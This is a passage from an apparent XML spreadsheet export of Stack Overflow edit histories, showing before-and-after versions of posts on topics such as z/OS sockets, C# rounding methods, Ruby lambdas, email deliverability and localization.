 &lt;p&gt; I've been having issues getting the &lt;span class="diff-add"&gt;C sockets API&lt;/span&gt; to work properly in &lt;span class="diff-add"&gt;C++&lt;/span&gt;. Specifically, &lt;span class="diff-add"&gt;although I am&lt;/span&gt; including &lt;code&gt;sys/socket.h&lt;/code&gt;, &lt;span class="diff-add"&gt;I&lt;/span&gt; still &lt;span class="diff-add"&gt;get&lt;/span&gt; compile time errors telling me that &lt;code&gt;AF_INET&lt;/code&gt; is not defined. Am I missing something obvious, or could this be related to the fact that I'm doing this coding on &lt;code&gt;z/OS&lt;/code&gt; and my problems are much more complicated?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Upon further investigation, I discovered that there is an &lt;span class="diff-add"&gt;#ifdef&lt;/span&gt; that I'm hitting. Apparently &lt;code&gt;z/OS&lt;/code&gt; isn't happy unless I define which &lt;span class="diff-add"&gt;"type"&lt;/span&gt; of sockets I'm using with:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; _OE_SOCKETS&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now, I personally have no idea what this &lt;code&gt;_OE_SOCKETS&lt;/code&gt; is actually for, so if any &lt;code&gt;z/OS&lt;/code&gt; sockets programmers are out there (all 3 of you), perhaps you could give me a rundown &lt;span class="diff-add"&gt;of&lt;/span&gt; how this all works?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>emlai</t>
  </si>
  <si>
    <t>user5857081</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Math.Floor&lt;/code&gt; rounds down, &lt;code&gt;Math.Ceiling&lt;/code&gt; rounds up, and &lt;code&gt;Math.Truncate&lt;/code&gt; rounds towards zero. Thus, &lt;code&gt;Math.Truncate&lt;/code&gt; is like &lt;code&gt;Math.Floor&lt;/code&gt; for positive numbers, and like &lt;code&gt;Math.Ceiling&lt;/code&gt; for negative numbers. Here's the &lt;a href="http://msdn.microsoft.com/en-us/library/system.math.truncate.aspx" rel="nofollow noreferrer"&gt;reference&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; For completeness, &lt;code&gt;Math.Round&lt;/code&gt; rounds to the nearest integer. If the number is exactly midway between two integers, then it rounds towards the even one. &lt;a href="http://msdn.microsoft.com/en-us/library/system.math.round.aspx" rel="nofollow noreferrer"&gt;Reference.&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; See also: &lt;a href="http://stackoverflow.com/questions/14/whats-the-difference-between-math-floor-and-math-truncate-in-c/580252#580252"&gt;&lt;span class="diff-delete"&gt;Pax's&lt;/span&gt; answer&lt;/a&gt;. Highly recommended!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Math.Floor&lt;/code&gt; rounds down, &lt;code&gt;Math.Ceiling&lt;/code&gt; rounds up, and &lt;code&gt;Math.Truncate&lt;/code&gt; rounds towards zero. Thus, &lt;code&gt;Math.Truncate&lt;/code&gt; is like &lt;code&gt;Math.Floor&lt;/code&gt; for positive numbers, and like &lt;code&gt;Math.Ceiling&lt;/code&gt; for negative numbers. Here's the &lt;a href="http://msdn.microsoft.com/en-us/library/system.math.truncate.aspx" rel="nofollow noreferrer"&gt;reference&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; For completeness, &lt;code&gt;Math.Round&lt;/code&gt; rounds to the nearest integer. If the number is exactly midway between two integers, then it rounds towards the even one. &lt;a href="http://msdn.microsoft.com/en-us/library/system.math.round.aspx" rel="nofollow noreferrer"&gt;Reference.&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; See also: &lt;a href="http://stackoverflow.com/questions/14/whats-the-difference-between-math-floor-and-math-truncate-in-c/580252#580252"&gt;&lt;span class="diff-add"&gt;Pax Diablo's&lt;/span&gt; answer&lt;/a&gt;. Highly recommended!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>paxdiablo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I want&lt;/span&gt; to get my databases under version control. Does anyone have any advice or recommended articles to get me started?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I'll always want to have at least &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;some&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; data in there (as &lt;/span&gt;&lt;a href="https://stackoverflow.com/users/80/alumb"&gt;&lt;span class="diff-delete"&gt;alumb&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; mentions: user types and administrators). I'll also often want a large collection of generated test data for performance measurements.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I've been wanting&lt;/span&gt; to get my databases under version control. Does anyone have any advice or recommended articles to get me started?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brock Adams</t>
  </si>
  <si>
    <t>Peter Featherstone</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; What's the optimal level of concurrency that the C++ implementation of &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;BerkeleyDB&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; can reasonably support?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; How many threads can I have hammering away at the DB before throughput starts to suffer because of &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;resource contention&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I've read the manual and know how to set the number of locks, lockers, database page size, etc., but I'd just like some advice from someone who has real-world experience with &lt;code&gt;&lt;span class="diff-delete"&gt;BDB concurrency&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; My application is pretty simple, I'll be doing gets and puts of records that are about 1KB each. No cursors, no deleting.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; What's the optimal level of concurrency that the C++ implementation of BerkeleyDB can reasonably support?&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; How many threads can I have hammering away at the DB before throughput starts to suffer because of resource contention?&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I've read the manual and know how to set the number of locks, lockers, database page size, etc., but I'd just like some advice from someone who has real-world experience with &lt;span class="diff-add"&gt;BDB concurrency&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; My application is pretty simple, I'll be doing gets and puts of records that are about 1KB each. No cursors, no deleting.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Lightness Races in Orbit</t>
  </si>
  <si>
    <t>piyushj</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use email authentication methods, such as &lt;a href="http://en.wikipedia.org/wiki/Sender_Policy_Framework" rel="nofollow noreferrer"&gt;SPF&lt;/a&gt;, and &lt;a href="https://help.ubuntu.com/community/Postfix/DKIM" rel="nofollow noreferrer"&gt;DKIM&lt;/a&gt;&lt;span class="diff-delete"&gt;, and &lt;/span&gt;&lt;a href="https://dmarc.org/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;DMARC&lt;/span&gt;&lt;/a&gt; to prove that your emails and your domain name belong together, and to prevent spoofing of your domain name. &lt;span class="diff-delete"&gt;You can use&lt;/span&gt; a &lt;a href="https://www.unlocktheinbox.com/spfwizard/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;SPF Wizard&lt;/span&gt;&lt;/a&gt; to generate the DNS information for your site.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://ipadmin.junkemailfilter.com/rdns.php" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Check&lt;/span&gt;&lt;/a&gt; your &lt;a href="https://en.wikipedia.org/wiki/Reverse_DNS_lookup" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;reverse DNS&lt;/span&gt;&lt;/a&gt; to make sure the IP address of your mail server points to the domain name that you use for sending mail.&lt;/p&gt; _x000D_
 &lt;p&gt; Make sure that the IP-address that you're using is &lt;a href="https://www.spamhaus.org/lookup/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;not on a blacklist&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Make sure that the reply-to address is a valid, existing address.&lt;/p&gt; _x000D_
 &lt;p&gt; Use the full, real name of the addressee in the To field, not just the email-address (e.g. &lt;code&gt;"John Smith" &amp;lt;john@blacksmiths-international.com&amp;gt;&lt;/code&gt; ).&lt;/p&gt; _x000D_
 &lt;p&gt; Monitor your abuse accounts, such as &lt;strong&gt;&lt;span class="diff-delete"&gt;abuse@yourdomain.com&lt;/span&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;span class="diff-delete"&gt;postmaster@yourdomain.com&lt;/span&gt;&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; That means&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; Make sure that these accounts exist&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; Read what's sent to them&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; Act on complaints.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Finally, make it &lt;strong&gt;really&lt;/strong&gt; easy to unsubscribe. Otherwise, your users will unsubscribe by pressing the &lt;strong&gt;spam&lt;/strong&gt; button, and that will affect your reputation.&lt;/p&gt; _x000D_
 &lt;p&gt; That said, getting Hotmail to accept your emails remains a black art.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use email authentication methods, such as &lt;a href="http://en.wikipedia.org/wiki/Sender_Policy_Framework" rel="nofollow noreferrer"&gt;SPF&lt;/a&gt;, and &lt;a href="https://help.ubuntu.com/community/Postfix/DKIM" rel="nofollow noreferrer"&gt;DKIM&lt;/a&gt; to prove that your emails and your domain name belong together, and to prevent spoofing of your domain name. &lt;span class="diff-add"&gt;The SPF website includes&lt;/span&gt; a &lt;span class="diff-add"&gt;wizard&lt;/span&gt; to generate the DNS information for your site.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://remote.12dt.com/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Check&lt;/span&gt;&lt;/a&gt; your &lt;a href="http://en.wikipedia.org/wiki/Reverse_DNS_lookup" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;reverse DNS&lt;/span&gt;&lt;/a&gt; to make sure the IP address of your mail server points to the domain name that you use for sending mail.&lt;/p&gt; _x000D_
 &lt;p&gt; Make sure that the IP-address that you're using is &lt;a href="http://www.spamhaus.org/lookup.lasso" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;not on a blacklist&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Make sure that the reply-to address is a valid, existing address.&lt;/p&gt; _x000D_
 &lt;p&gt; Use the full, real name of the addressee in the To field, not just the email-address (e.g. &lt;code&gt;"John Smith" &amp;lt;john@blacksmiths-international.com&amp;gt;&lt;/code&gt; ).&lt;/p&gt; _x000D_
 &lt;p&gt; Monitor your abuse accounts, such as &lt;span class="diff-add"&gt;abuse@yourdomain.com&lt;/span&gt; and &lt;span class="diff-add"&gt;postmaster@yourdomain&lt;/span&gt;.&lt;span class="diff-add"&gt;com.&lt;/span&gt; That means&lt;span class="diff-add"&gt; - make sure that these accounts exist, read what's sent to them, and act on complaints.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Finally, make it &lt;strong&gt;really&lt;/strong&gt; easy to unsubscribe. Otherwise, your users will unsubscribe by pressing the &lt;strong&gt;spam&lt;/strong&gt; button, and that will affect your reputation.&lt;/p&gt; _x000D_
 &lt;p&gt; That said, getting Hotmail to accept your emails remains a black art.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>animuson</t>
  </si>
  <si>
    <t>Henry</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yahoo uses a method called Sender ID, which can be configured at &lt;a href="https://www.unlocktheinbox.com/spfwizard/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;The SPF Setup Wizard&lt;/span&gt;&lt;/a&gt; and entered in to your DNS. Also one of the important ones for Exchange, Hotmail, AOL, Yahoo, and others is to have a Reverse DNS for your domain. Those will knock out most of the issues. However you can never prevent a person intentionally blocking your or custom rules.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yahoo uses a method called Sender ID, which can be configured at &lt;a href="http://old.openspf.org/wizard.html?mydomain=stackoverflow.com" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;The SPF Setup Wizard&lt;/span&gt;&lt;/a&gt; and entered in to your DNS. Also one of the important ones for Exchange, Hotmail, AOL, Yahoo, and others is to have a Reverse DNS for your domain. Those will knock out most of the issues. However you can never prevent a person intentionally blocking your or custom rules.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm writing a CMS application in PHP and one of the requirements is that it must be able to interface with the customer's Exchange server. I've written up this functionality a few times before and have always used &lt;a href="http://en.wikipedia.org/wiki/WebDAV" rel="nofollow noreferrer"&gt;WebDAV&lt;/a&gt; to do it, but now I'm leaning away from that.&lt;/p&gt; _x000D_
 &lt;p&gt; I will be running the site on IIS OR Apache (no preference) on Windows server 2008. A few things I would need to do include adding contacts to a given user's address book, sending emails as a given user and running reports on contacts for a user.&lt;/p&gt; _x000D_
 &lt;p&gt; All of this is pretty easy to do with WebDAV, but if there is a better way that doesn't require any functionality that is likely to be deprecated any time soon.&lt;/p&gt; _x000D_
 &lt;p&gt; Any ideas?&lt;/p&gt; _x000D_
 &lt;p&gt; ###Update: Justin, I love the idea of using com objects, I just worry about maintaining a 3rd product to make everything work...&lt;/p&gt; _x000D_
 &lt;p&gt; John, I can write a web service in C# to interface with for these functions and access it with my PHP app, but it's also a little bit out of the way.&lt;/p&gt; _x000D_
 &lt;p&gt; So far, I'm not 100% convinced that either of these is better than WebDAV... Can anyone show me where I'm being silly?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm writing a CMS application in PHP and one of the requirements is that it must be able to interface with the customer's Exchange server. I've written up this functionality a few times before and have always used &lt;a href="http://en.wikipedia.org/wiki/WebDAV" rel="nofollow noreferrer"&gt;WebDAV&lt;/a&gt; to do it, but now I'm leaning away from that.&lt;/p&gt; _x000D_
 &lt;p&gt; I will be running the site on IIS OR Apache (no preference) on Windows server 2008. A few things I would need to do include adding contacts to a given user's address book, sending emails as a given user and running reports on contacts for a user.&lt;/p&gt; _x000D_
 &lt;p&gt; All of this is pretty easy to do with WebDAV, but if there is a better way that doesn't require any functionality that is likely to be deprecated any time soon.&lt;/p&gt; _x000D_
 &lt;p&gt; Any ideas?&lt;/p&gt; _x000D_
 &lt;p&gt; ###Update: Justin, I love the idea of using com objects, I just worry about maintaining a 3rd product to make everything work...&lt;/p&gt; _x000D_
 &lt;p&gt; John, I can write a web service in C# to interface with for these functions and access it with my PHP app, but it's also a little bit out of the way.&lt;/p&gt; _x000D_
 &lt;p&gt; So far, I'm not 100% convinced that either of these is better than WebDAV... Can anyone show me where I'm being silly?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks, both of you.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>RedBlueThing</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I found &lt;a href="http://raulparolari.com/Ruby2/lambda_Proc" rel="nofollow noreferrer"&gt;this page&lt;/a&gt; which shows what the difference between Proc.new and lambda are. According to the page, the only difference is that a lambda is strict about the number of arguments it accepts, whereas Proc.new converts missing arguments to nil. Here is an example IRB session illustrating the difference:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;irb(main):001:0&amp;gt; l = lambda { |x, y| x + y }_x000D_
=&amp;gt; #&amp;lt;Proc:0x00007fc605ec0748@(irb):1&amp;gt;_x000D_
irb(main):002:0&amp;gt; p = Proc.new { |x, y| x + y }_x000D_
=&amp;gt; #&amp;lt;Proc:0x00007fc605ea8698@(irb):2&amp;gt;_x000D_
irb(main):003:0&amp;gt; l.call "hello", "world"_x000D_
=&amp;gt; "helloworld"_x000D_
irb(main):004:0&amp;gt; p.call "hello", "world"_x000D_
=&amp;gt; "helloworld"_x000D_
irb(main):005:0&amp;gt; l.call "hello"_x000D_
ArgumentError: wrong number of arguments (1 for 2)_x000D_
    from (irb):1_x000D_
    from (irb):5:in &lt;span class="diff-delete"&gt;'call'&lt;/span&gt;_x000D_
    from (irb):5_x000D_
    from :0_x000D_
irb(main):006:0&amp;gt; p.call "hello"_x000D_
TypeError: &lt;span class="diff-delete"&gt;"can't&lt;/span&gt; convert nil into &lt;span class="diff-delete"&gt;String"&lt;/span&gt;_x000D_
    from (irb):2:in &lt;span class="diff-delete"&gt;'+'&lt;/span&gt;_x000D_
    from (irb):2_x000D_
    from (irb):6:in &lt;span class="diff-delete"&gt;'call'&lt;/span&gt;_x000D_
    from (irb):6_x000D_
    from :0_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The page also recommends using lambda unless you specifically want the error tolerant behavior. I agree with this sentiment. Using a lambda seems a tad more concise, and with such an insignificant difference, it seems the better choice in the average situation.&lt;/p&gt; _x000D_
 &lt;p&gt; As for Ruby 1.9, sorry, I haven't looked into 1.9 yet, but I don't imagine they would change it all that much (don't take my word for it though, it seems you have heard of some changes, so I am probably wrong there).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I found &lt;a href="http://raulparolari.com/Ruby2/lambda_Proc" rel="nofollow noreferrer"&gt;this page&lt;/a&gt; which shows what the difference between Proc.new and lambda are. According to the page, the only difference is that a lambda is strict about the number of arguments it accepts, whereas Proc.new converts missing arguments to nil. Here is an example IRB session illustrating the difference:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;irb(main):001:0&amp;gt; l = lambda { |x, y| x + y }_x000D_
=&amp;gt; #&amp;lt;Proc:0x00007fc605ec0748@(irb):1&amp;gt;_x000D_
irb(main):002:0&amp;gt; p = Proc.new { |x, y| x + y }_x000D_
=&amp;gt; #&amp;lt;Proc:0x00007fc605ea8698@(irb):2&amp;gt;_x000D_
irb(main):003:0&amp;gt; l.call "hello", "world"_x000D_
=&amp;gt; "helloworld"_x000D_
irb(main):004:0&amp;gt; p.call "hello", "world"_x000D_
=&amp;gt; "helloworld"_x000D_
irb(main):005:0&amp;gt; l.call "hello"_x000D_
ArgumentError: wrong number of arguments (1 for 2)_x000D_
    from (irb):1_x000D_
    from (irb):5:in &lt;span class="diff-add"&gt;`call'&lt;/span&gt;_x000D_
    from (irb):5_x000D_
    from :0_x000D_
irb(main):006:0&amp;gt; p.call "hello"_x000D_
TypeError: &lt;span class="diff-add"&gt;can't&lt;/span&gt; convert nil into &lt;span class="diff-add"&gt;String&lt;/span&gt;_x000D_
    from (irb):2:in &lt;span class="diff-add"&gt;`+'&lt;/span&gt;_x000D_
    from (irb):2_x000D_
    from (irb):6:in &lt;span class="diff-add"&gt;`call'&lt;/span&gt;_x000D_
    from (irb):6_x000D_
    from :0_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The page also recommends using lambda unless you specifically want the error tolerant behavior. I agree with this sentiment. Using a lambda seems a tad more concise, and with such an insignificant difference, it seems the better choice in the average situation.&lt;/p&gt; _x000D_
 &lt;p&gt; As for Ruby 1.9, sorry, I haven't looked into 1.9 yet, but I don't imagine they would change it all that much (don't take my word for it though, it seems you have heard of some changes, so I am probably wrong there).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mike Stone</t>
  </si>
  <si>
    <t>Kredns</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The Activator class within the root System namespace is pretty powerful.&lt;/p&gt; _x000D_
 &lt;p&gt; There are a lot of overloads for passing parameters to the constructor and such. Check out the documentation at: &lt;a href="http://msdn.microsoft.com/en-us/library/system.activator.createinstance.aspx" rel="nofollow noreferrer"&gt;http://msdn.microsoft.com/en-us/library/system.activator.createinstance.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Here are some simple examples:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;ObjectType instance = (ObjectType)Activator.CreateInstance(objectType);_x000D_
_x000D_
ObjectType instance = (ObjectType)Activator.CreateInstance(&lt;span class="diff-delete"&gt;Type.GetType(&lt;/span&gt;&lt;span class="hljs-string"&gt;"MyNamespace.ObjectType, MyAssembly"&lt;/span&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The Activator class within the root System namespace is pretty powerful.&lt;/p&gt; _x000D_
 &lt;p&gt; There are a lot of overloads for passing parameters to the constructor and such. Check out the documentation at: &lt;a href="http://msdn.microsoft.com/en-us/library/system.activator.createinstance.aspx" rel="nofollow noreferrer"&gt;http://msdn.microsoft.com/en-us/library/system.activator.createinstance.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Here are some simple examples:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;ObjectType instance = (ObjectType)Activator.CreateInstance(objectType);_x000D_
_x000D_
ObjectType instance = (ObjectType)Activator.CreateInstance(&lt;span class="hljs-string"&gt;"MyNamespace.ObjectType, MyAssembly"&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kermit</t>
  </si>
  <si>
    <t>Folkert</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I worked on a project for my previous employer that used &lt;code&gt;&lt;span class="diff-delete"&gt;.NET&lt;/span&gt;&lt;/code&gt;, and there was a built in &lt;code&gt;&lt;span class="diff-delete"&gt;.resx&lt;/span&gt;&lt;/code&gt; format we used. We basically had a file that had all translations in the &lt;code&gt;&lt;span class="diff-delete"&gt;.resx&lt;/span&gt;&lt;/code&gt; file, and then multiple files with different translations. &lt;span class="diff-delete"&gt;The&lt;/span&gt; consequence of this is that you have to be very diligent about ensuring that all strings visible in the application are stored in the &lt;code&gt;&lt;span class="diff-delete"&gt;.resx&lt;/span&gt;&lt;/code&gt;, and anytime one is changed you have to update all languages you support.&lt;/p&gt; _x000D_
 &lt;p&gt; If you get lazy and don't notify the people in charge of translations, or you embed strings without going through your localization system, it will be a nightmare to try and fix it later. Similarly, if localization is an afterthought, it will be very difficult to put in place. Bottom line, if you don't have all visible strings stored externally in a standard place, it will be very difficult to find all that need to be localized.&lt;/p&gt; _x000D_
 &lt;p&gt; One other note, very strictly avoid concatenating visible strings directly, such as&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String message = "The " + item + " is on sale!";_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Instead, you must use something like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String message = String.Format("The {0} is on sale!", item);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The reason for this is that different languages often order the words differently, and concatenating strings directly will need a new build to fix, but if you used some kind of string replacement mechanism like above, you can modify your &lt;code&gt;&lt;span class="diff-delete"&gt;.resx&lt;/span&gt;&lt;/code&gt; file (or whatever localization files you use) for the specific language that needs to reorder the words.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I worked on a project for my previous employer that used &lt;span class="diff-add"&gt;.NET&lt;/span&gt;, and there was a built in &lt;span class="diff-add"&gt;.resx&lt;/span&gt; format we used. We basically had a file that had all translations in the &lt;span class="diff-add"&gt;.resx&lt;/span&gt; file, and then multiple files with different translations. &lt;span class="diff-add"&gt; The&lt;/span&gt; consequence of this is that you have to be very diligent about ensuring that all strings visible in the application are stored in the &lt;span class="diff-add"&gt;.resx&lt;/span&gt;, and anytime one is changed you have to update all languages you support.&lt;/p&gt; _x000D_
 &lt;p&gt; If you get lazy and don't notify the people in charge of translations, or you embed strings without going through your localization system, it will be a nightmare to try and fix it later. Similarly, if localization is an afterthought, it will be very difficult to put in place. Bottom line, if you don't have all visible strings stored externally in a standard place, it will be very difficult to find all that need to be localized.&lt;/p&gt; _x000D_
 &lt;p&gt; One other note, very strictly avoid concatenating visible strings directly, such as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String message = "The " + item + " is on sale!";_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Instead, you must use something like&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String message = String.Format("The {0} is on sale!", item);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The reason for this is that different languages often order the words differently, and concatenating strings directly will need a new build to fix, but if you used some kind of string replacement mechanism like above, you can modify your &lt;span class="diff-add"&gt;.resx&lt;/span&gt; file (or whatever localization files you use) for the specific language that needs to reorder the words.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Barber</t>
  </si>
  <si>
    <t>CloudyMarble</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Most mathematicians agree that &lt;code&gt;&lt;span class="diff-delete"&gt;exp(Ï€i) + 1 = 0&lt;/span&gt;&lt;/code&gt;. However, most floating point implementations disagree. How well can we settle this dispute?&lt;/p&gt; _x000D_
 &lt;p&gt; I'm keen to hear about different languages and implementations, and various methods to make the result as close to zero as possible. Be creative!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Most mathematicians agree that&lt;span class="diff-add"&gt; e **&lt;/span&gt; &lt;span class="diff-add"&gt;(Ï€i) + 1 = 0&lt;/span&gt;. However, most floating point implementations disagree. How well can we settle this dispute?&lt;/p&gt; _x000D_
 &lt;p&gt; I'm keen to hear about different languages and implementations, and various methods to make the result as close to zero as possible. Be creative!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Foo Bah</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've just set up Sandcastle again. Try installing it (the May 2008 release) and search for &lt;code&gt;&lt;span class="diff-delete"&gt;SandcastleGui.exe&lt;/span&gt;&lt;/code&gt; or something similar (it's in the examples folder or so).&lt;/p&gt; _x000D_
